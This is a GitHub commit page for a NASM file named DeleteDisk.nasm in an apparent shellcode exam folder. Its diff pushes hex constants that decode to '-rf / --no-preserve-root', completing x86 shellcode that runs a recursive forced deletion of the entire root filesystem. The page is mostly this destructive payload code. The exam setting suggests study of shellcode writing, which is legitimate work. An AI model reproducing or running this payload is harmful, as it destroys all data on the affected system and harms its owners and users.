Skip to content

Commit

Permalink
Fixing.
Browse files Browse the repository at this point in the history
  • Loading branch information
cr7pt0pl4gu3 committed Nov 15, 2020
1 parent 72e53ea commit c2b8af6
Showing 1 changed file with 6 additions and 2 deletions.
8 changes: 6 additions & 2 deletions Exam/DeleteDisk/DeleteDisk.nasm
Original file line number Diff line number Diff line change
Expand Up @@ -15,8 +15,12 @@ _start:
mov ebx, esp ;move pointer to command into ebx

push eax ;push null eax register to the stack
push 0x2f2f2f2f
push 0x7666722d ;push argument to the stack "-rf"
push 0x746f6f72
push 0x2d657672
push 0x65736572
push 0x702d6f6e
push 0x2d2d202f
push 0x2066722d
mov esi, esp ;move stack pointer to esi

Expand Down

0 comments on commit c2b8af6

Please sign in to comment.